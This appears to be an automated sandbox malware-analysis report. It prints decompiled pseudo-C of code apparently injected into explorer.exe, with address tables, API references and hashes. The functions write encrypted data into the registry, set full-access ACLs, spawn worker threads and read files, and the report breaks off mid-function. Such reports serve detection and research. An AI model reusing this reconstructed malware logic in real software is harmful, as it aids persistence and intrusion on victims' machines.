0x000c6e39
0x000c6e42
0x000c6e42
0x000c6e46
0x000c6e4b
0x000c6e52
0x000c6e57
0x000c6e5d
0x000c6e62
0x000c6e6a
0x000c6e72
0x000c6ec0
0x000c6ec7
0x000c6ec9
0x000c6ecd
0x00000000
0x000c6ecd
0x000c6e74
0x000c6e74
0x000c6e7c
0x000c6e7d
0x000c6e82
0x000c6e84
0x000c6e96
0x000c6ea7
0x000c6eac
0x000c6eb5
0x00000000
0x00000000
0x00000000
0x00000000
0x000c6e84
0x000c6e72
0x00000000
0x000c6e57
0x000c6ede
0x000c6ee4
0x000c6e0a
0x000c6eeb

APIs

MoveFileW.KERNEL32 ref: 000C6EB5

Strings

%s.%u, xrefs: 000C6E98

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: e9ba16e1cd3f4fd01c2996ceb48579633d2dc54d44a3b4d243ad9e7627ad9786
Instruction ID: 16c242f961a16b44c7ea8ae58b162dabe7e8efe05d509a60da4a7651e3b0c8da
Opcode Fuzzy Hash: e9ba16e1cd3f4fd01c2996ceb48579633d2dc54d44a3b4d243ad9e7627ad9786
Instruction Fuzzy Hash: 07318B753053509AE664FB65DC8AFAE339ADB90754F14002EFA058B2C3EF2AD905C762

Uniqueness

Uniqueness Score: -1.00%

Function 000C2AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000C2AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0xde710 * 0x64;
				_t39 = 0;
				_v12 =  *0xde710 * 0x64;
				_t16 = E000C8604(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0xde710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E000C9F48(0xe); // executed
						E000C861A( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0xde714; // 0x14af5b0
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0xde714; // 0x14af5b0
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E000C9601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0xde710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x000c2af0
0x000c2afa
0x000c2afd
0x000c2b00
0x000c2b05
0x000c2b07
0x000c2b0d
0x000c2b17
0x000c2b1d
0x000c2b1f
0x000c2b24
0x000c2b81
0x000c2b87
0x000c2b8b
0x000c2b96
0x00000000
0x000c2b9d
0x000c2b26
0x000c2b28
0x000c2b28
0x000c2b31
0x000c2b35
0x000c2b3d
0x000c2b43
0x000c2b43
0x000c2b44
0x000c2b49
0x000c2b4d
0x000c2b63
0x000c2b68
0x000c2b6e
0x000c2b71
0x000c2b74
0x000c2b74
0x000c2b76
0x000c2b77
0x000c2b7a
0x000c2b7d
0x00000000
0x000c2b28
0x00000000

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

lstrcatA.KERNEL32(00000000,000DB9A0,000C573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,000C573E), ref: 000C2B3D

Strings

%u;%u;%u, xrefs: 000C2B59

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
Opcode ID: 3ed37b67dce4f13b35f758d7024069cdf9e40f50b9608239a56521b6dd9233e4
Instruction ID: c18da029e8387f57c48651e8e1138d8feb965970a6bd18960df813de622e7610
Opcode Fuzzy Hash: 3ed37b67dce4f13b35f758d7024069cdf9e40f50b9608239a56521b6dd9233e4
Instruction Fuzzy Hash: A4110632A01304ABDB14EFA9DCC5E9E7BB9EB84324B10446EE900DB191CB349D00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 000CBD10, Relevance: 3.1, APIs: 2, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E000CBD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0xde68c; // 0x14cfab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0xde68c; // 0x14cfab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0xde68c; // 0x14cfab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0xde688; // 0xf0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0xde68c; // 0x14cfab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0xde68c; // 0x14cfab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0xde68c; // 0x14cfab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0xde68c; // 0x14cfab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0xde68c; // 0x14cfab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0xde68c; // 0x14cfab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x000cbd1b
0x000cbd1e
0x000cbd26
0x000cbd2c
0x000cbd2f
0x000cbd34
0x000cbd3a
0x000cbd3b
0x000cbd3c
0x000cbd3d
0x000cbd3e
0x000cbd3f
0x000cbd40
0x000cbd41
0x000cbd44
0x000cbd47
0x000cbd49
0x000cbd4c
0x000cbd50
0x000cbd53
0x000cbd54
0x000cbd59
0x000cbd60
0x000cbe54
0x000cbe58
0x000cbe5a
0x000cbe62
0x000cbe62
0x000cbe69
0x000cbe6b
0x000cbe73
0x000cbe73
0x000cbe78
0x000cbe7a
0x000cbe80
0x000cbe80
0x000cbe87
0x000cbe89
0x000cbe91
0x000cbe91
0x000cbe95
0x000cbe9a
0x000cbe9a
0x000cbd6b
0x000cbd6e
0x000cbd75
0x000cbd76
0x000cbd7d
0x000cbd80
0x000cbd87
0x000cbd8a
0x000cbd95
0x000cbda0
0x00000000
0x00000000
0x00000000
0x000cbda2
0x000cbda2
0x000cbda5
0x000cbda6
0x000cbda7
0x000cbda8
0x000cbda9
0x000cbdaa
0x000cbdab
0x000cbdac
0x000cbdae
0x000cbdaf
0x000cbdb3
0x000cbdb4
0x000cbdbe
0x00000000
0x000cbdc4
0x000cbdc4
0x000cbdc9
0x000cbdcb
0x000cbdcd
0x000cbdce
0x000cbdd5
0x000cbdd8
0x000cbddf
0x000cbde2
0x000cbde5
0x000cbde5
0x000cbde8
0x000cbdeb
0x000cbdec
0x000cbdf0
0x000cbdf1
0x000cbdf6
0x000cbdfc
0x00000000
0x00000000
0x000cbe08
0x000cbe0c
0x00000000
0x00000000
0x000cbe0e
0x000cbe14
0x000cbe16
0x000cbe1f
0x00000000
0x00000000
0x000cbe21
0x000cbe26
0x000cbe27
0x000cbe2a
0x000cbe2c
0x000cbe35
0x00000000
0x00000000
0x000cbe3a
0x000cbe3c
0x000cbe44
0x000cbe44
0x000cbe47
0x000cbe4f
0x00000000
0x000cbe4f
0x000cbdbe

APIs

SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 000CBDF7
LocalAlloc.KERNEL32(00000040,00000014), ref: 000CBE02

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocEntriesLocal
String ID:
API String ID: 2146116654-0
Opcode ID: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
Instruction ID: fb9cf3d49498b04ba18fc6af388e3f93cc6b6c7a00e5ba42f1d92bd048f5cdbb
Opcode Fuzzy Hash: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
Instruction Fuzzy Hash: C5512B71901248EFDB20DF99D889FDDBBF8EF44700F15806AF605AB2A0D7748944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000CA0AB, Relevance: 3.1, APIs: 2, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E000CA0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t48;
				signed int _t49;
				char* _t54;
				long _t73;
				long _t80;
				long _t83;
				intOrPtr _t84;
				void* _t88;
				char* _t89;
				intOrPtr _t90;
				void* _t103;
				void* _t104;
				char* _t106;
				intOrPtr _t107;
				char _t108;

				_t48 = __ecx;
				_t89 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t49 = _t48 | 0xffffffff;
					__eflags = _t49;
					return _t49;
				} else {
					_t115 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_t107 =  *((intOrPtr*)(__ecx + 0x108));
					_push(_t107);
					_t103 = 4;
					_v12 = __edx;
					_v28 = E000CD400( &_v12, _t103);
					_t93 = _t107 + __edx;
					E000D2301(_t107 + __edx,  &_v2832);
					_t54 = E000D242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
					_t108 = _a8;
					_v12 = _t54;
					_v20 = _t54 + 6 + _t108;
					_t106 = E000C8604(_t54 + 6 + _t108);
					_v32 = _t106;
					if(_t106 != 0) {
						 *_t106 = _a12;
						_t16 =  &(_t106[6]); // 0x6
						_t106[1] = 1;
						_t106[2] = _t108;
						E000C86E1(_t16, _a4, _t108);
						_t21 = _t108 + 6; // 0x6
						E000D22D3( &_v2832, _t21 + _t106, _v12);
						_v16 = _t89;
						_t90 = _v24;
						_v12 =  *((intOrPtr*)(_t90 + 0x108));
						_push( &_v52);
						_t104 = 8;
						E000CF490( &_v16, _t104);
						E000CEAC1( &_v16,  &_v52, 0x14,  &_v328);
						E000CEB2E(_t106, _v20,  &_v328);
						_t73 = E000C9B0E(_t90);
						_v12 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E000C97A0(_v28,  &_v64, 0x10);
							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t80;
							if(_t80 == 0) {
								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
								__eflags = _t83;
								if(_t83 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								_t84 =  *0xde68c; // 0x14cfab8
								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E000C861A( &_v12, 0xffffffff);
						}
						E000C861A( &_v32, 0);
						return 0;
					}
					_t88 = 0xfffffffe;
					return _t88;
				}
			}

0x000ca0b8
0x000ca0bd
0x000ca0bf
0x000ca0c2
0x000ca231
0x000ca231
0x000ca231
0x00000000
0x000ca0d2
0x000ca0d2
0x000ca0d4
0x00000000
0x00000000
0x000ca0da
0x000ca0e3
0x000ca0e6
0x000ca0e7
0x000ca0ef
0x000ca0f2
0x000ca0fd
0x000ca10d
0x000ca112
0x000ca115
0x000ca11e
0x000ca126
0x000ca12b
0x000ca130
0x000ca13d
0x000ca13f
0x000ca146
0x000ca14b
0x000ca14e
0x000ca156
0x000ca163
0x000ca168
0x000ca16e
0x000ca177
0x000ca17d
0x000ca180
0x000ca181
0x000ca193
0x000ca1a3
0x000ca1af
0x000ca1b4
0x000ca1b7
0x000ca1b9
0x000ca1c3
0x000ca1de
0x000ca1e1
0x000ca1e3
0x000ca1fe
0x000ca201
0x000ca203
0x000ca205
0x000ca207
0x000ca207
0x000ca208
0x000ca210
0x000ca1e5
0x000ca1e5
0x000ca1e7
0x000ca1e7
0x000ca219
0x000ca21f
0x000ca226
0x00000000
0x000ca22d
0x000ca134
0x00000000
0x000ca134

APIs

Part of subcall function 000D242D: _ftol2_sse.MSVCRT ref: 000D248E

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 000CA1DE

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeapOpen_ftol2_sse
String ID:
API String ID: 3756893521-0
Opcode ID: 2e96345b894416f03581f96fa21f1bef7d609ef5021c4115ced1ea1f279122d7
Instruction ID: 9aabb578f3ec898990dbc52fcad180c0f02837a836db019fe8de1ec4e559170f
Opcode Fuzzy Hash: 2e96345b894416f03581f96fa21f1bef7d609ef5021c4115ced1ea1f279122d7
Instruction Fuzzy Hash: B451B072A0021DBBCF10DF98DC85FDEBBB8AF05324F10826AF514AB191DB75A644CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000C98EE, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000C98EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0xde76c; // 0x1e0
				_t73 = 0;
				if(E000CA4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0xde770; // 0x14af948
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0xde770; // 0x14af948
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0xde770; // 0x14af948
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0xde770; // 0x14af948
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E000CA471(0, 1);
									_t82 =  *0xde770; // 0x14af948
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0xde770; // 0x14af948
									_t30 = _t83 + _t113 + 4; // 0x14af94c
									_t52 = CreateThread(_t73, _t73, E000C98A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0xde770; // 0x14af948
									 *(_t113 + _t53) = _t52;
									_t54 =  *0xde770; // 0x14af948
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0xde770; // 0x14af948
										 *0xde774 =  *0xde774 + 1;
										E000CA4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0xde770; // 0x14af948
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0xde684; // 0x14cf8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0xde770; // 0x14af948
										_t37 = _t61 + 0xc; // 0x14af954
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E000C861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0xde770; // 0x14af948
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0xde76c; // 0x1e0
									E000CA4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E000C8604(_t110);
								_t97 =  *0xde770; // 0x14af948
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0xde770; // 0x14af948
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0xde770; // 0x14af948
								E000C86E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0xde684; // 0x14cf8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0xde770; // 0x14af948
							goto L7;
						}
						_t98 =  *0xde770; // 0x14af948
						E000C984A(_t106 + _t98, 0);
						_t45 =  *0xde770; // 0x14af948
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x000c98f1
0x000c98f2
0x000c98f3
0x000c98fb
0x000c98fe
0x000c9905
0x000c990e
0x000c9917
0x000c991e
0x000c9920
0x000c9922
0x000c9922
0x000c9927
0x000c994f
0x000c9952
0x000c996c
0x000c9972
0x000c99b2
0x000c99b6
0x000c99bb
0x000c99bf
0x000c99bf
0x000c99cb
0x000c99cf
0x000c99d7
0x000c99dd
0x000c99e2
0x000c99e8
0x000c99ec
0x000c99f4
0x000c9a06
0x000c9a0b
0x000c9a10
0x000c9a13
0x000c9a18
0x000c9a1d
0x000c9a59
0x000c9a5f
0x000c9a65
0x000c9a6f
0x000c9a74
0x000c9a7a
0x000c9a1f
0x000c9a23
0x000c9a28
0x000c9a2b
0x000c9a30
0x000c9a33
0x000c9a37
0x000c9a3e
0x000c9a43
0x000c9a49
0x000c9a51
0x000c9a52
0x000c9a52
0x000c9a7c
0x000c9a7c
0x000c9a82
0x000c9a88
0x000c9a8b
0x000c9a8d
0x000c9a8d
0x000c9974
0x000c9978
0x000c997e
0x000c9984
0x000c9988
0x000c9991
0x00000000
0x00000000
0x000c9997
0x000c999b
0x000c99a8
0x000c99ad
0x00000000
0x000c99ad
0x00000000
0x000c9952
0x000c9929
0x000c992e
0x000c992f
0x000c9938
0x000c9965
0x00000000
0x000c9965
0x000c993a
0x000c9945
0x000c994a
0x00000000
0x000c9954
0x000c9954
0x000c9957
0x000c9958
0x00000000
0x000c9960
0x000c9910
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b706d2afef1e48847738e5b56cd5bccf8843d61e69a5daf5c80532c9489298a2
Instruction ID: 3d3aa86b3fc97478f4b26c36f13bdb5f84f11f0de64e280aef22ffd0665b4c3f
Opcode Fuzzy Hash: b706d2afef1e48847738e5b56cd5bccf8843d61e69a5daf5c80532c9489298a2
Instruction Fuzzy Hash: 21517271615640DFD7A9FF28EC84D6AB7F9FB48314354892EE8468B361DB34E802CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000C5631, Relevance: 3.1, APIs: 2, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E000C5631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E000C9E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E000C980C(0xde6c8);
					_t39 = 0x37; // executed
					E000C9F06(_t39);
					_t11 =  *0xde688; // 0xf0000
					_t40 = 0x3a; // executed
					E000C9F06(_t40); // executed
					E000CE4C1(_t63);
					_t14 =  *0xde688; // 0xf0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E000CA86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0xde684; // 0x14cf8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xde6c8,  *0xde6cc);
					 *0xde74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0xde76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E000C8604(0x1000);
							_t52 = 0;
							 *0xde770 = _t34;
							_t49 =  *0xde774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							 *0xde774 =  !=  ? 0 : _t49; // executed
						}
						E000C153B(_t41, _t52); // executed
						E000C98EE(E000C2EDA, 0, __eflags, 0, 0); // executed
						E000C3017(); // executed
						E000C31C2(0, __eflags); // executed
						E000C29B1(); // executed
						E000C3BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0xde758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E000C980C(0xde750);
							_push(0xde750);
							_push(0xde750); // executed
							E000C279B();
							Sleep(0xfa0);
						}
						E000C3D34();
						E000C9A8E();
						E000C34CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E000C2DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x000c5631
0x000c563d
0x000c5646
0x000c5651
0x000c5656
0x000c5669
0x000c566a
0x000c566f
0x000c567f
0x000c5680
0x000c5688
0x000c568d
0x000c5692
0x000c569c
0x000c569f
0x000c56a9
0x000c56b1
0x000c56b7
0x000c56be
0x000c56d0
0x000c56d6
0x000c56db
0x000c56dd
0x000c56e4
0x000c56e9
0x000c56eb
0x000c56f1
0x000c56f7
0x000c56f9
0x000c56fc
0x000c56fc
0x000c5702
0x000c5710
0x000c5717
0x000c571c
0x000c5721
0x000c5726
0x000c5750
0x000c5750
0x000c5756
0x00000000
0x00000000
0x000c5732
0x000c5737
0x000c5738
0x000c5739
0x000c574a
0x000c574a
0x000c5758
0x000c575d
0x000c5762
0x000c5767
0x000c5767
0x00000000
0x00000000
0x00000000
0x000c5648
0x000c5648
0x000c564d
0x000c564f
0x000c56c0
0x000c56c2
0x00000000
0x00000000
0x00000000
0x000c564f
0x000c576d

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000C56D0

Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819

Sleep.KERNELBASE(00000FA0), ref: 000C574A

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Time$CreateFileMutexSleepSystem
String ID:
API String ID: 1795067453-0
Opcode ID: 4d5827915dd088dcf897b8c63985e42f6f3fec60909fc7e0148919ce4e10ea8d
Instruction ID: eac5d3ba3098b1c205fc506b64538c27d0fa099f414122062ecd2b130421744d
Opcode Fuzzy Hash: 4d5827915dd088dcf897b8c63985e42f6f3fec60909fc7e0148919ce4e10ea8d
Instruction Fuzzy Hash: 3A31D4312066509BE764BB75EC4AFDE3B99DF15390B10412EF9098B1A3EE34D5408672

Uniqueness

Uniqueness Score: -1.00%

Function 000CA6A9, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E000CA63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0xde684; // 0x14cf8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E000C861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E000C8604(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x000ca6ac
0x000ca6ad
0x000ca6ae
0x000ca6b2
0x000ca6b4
0x000ca6b9
